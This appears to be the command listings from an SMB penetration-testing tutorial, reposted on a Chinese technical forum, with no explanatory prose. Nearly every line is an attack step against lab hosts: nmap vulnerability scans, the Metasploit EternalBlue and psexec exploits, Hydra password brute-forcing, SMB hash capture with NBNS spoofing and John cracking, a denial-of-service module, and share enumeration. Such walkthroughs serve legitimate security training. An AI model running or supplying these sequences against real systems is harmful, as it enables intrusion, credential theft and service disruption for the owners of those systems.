1 | nmap -p 445 -A 192.168.1.101 |
1 | nmap --script smb-vuln* -p 445 192.168.1.101 |
1 2 3 | use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101 msf exploit(ms17_010_eternalblue) > exploit |
1 | hydra -L user.txt -P pass.txt 192.168.1.101 smb |
1 2 3 4 5 | use auxiliary/scanner/smb/smb_enumusers msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101 msf auxiliary(smb_enumusers) > set smbuser raj msf auxiliary(smb_enumusers) > set smbpass 123 msf auxiliary(smb_enumusers) > exploit |
1 2 3 4 5 | use exploit/windows/smb/psexec msf exploit windows/smb/psexec) > set rhost 192.168.1.101 msf exploit(windows/smb/psexec) > set smbuser raj msf exploit(windows/smb/psexec) > set smbpass 123 msf exploit(windows/smb/psexec) > exploit |
1 2 3 | use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109 msf exploit(windows/smb/smb_delivery) > exploit |
1 2 3 4 | use auxiliary/server/capture/smb msf auxiliary(smb) > set srvhost 192.168.1.109 msf auxiliary(smb) > set johnpwfile /root/Desktop msf auxiliary(smb) > exploit |
1 2 3 4 | auxiliary/spoof/nbns/nbns_response msf auxiliary(nbns_response) > set spoofip 192.168.1.109 msf auxiliary(nbns_response) > set interface eth0 msf auxiliary(nbns_response) >exploit |
1 | john _smb_netntlmv2 |
1 2 3 | use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106 msf auxiliary(ms10_006_negotiate_response_loop) > exploit |
1 2 3 | use post/windows/gather/enum_shares msf post(enum_shares) > set session 1 msf post(enum_shares) > exploit |
1 | smbclient –L 192.168.1.108 |
1 | smbclient //192.168.1.108/raj |
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/) | Powered by Discuz! 6.0.0 |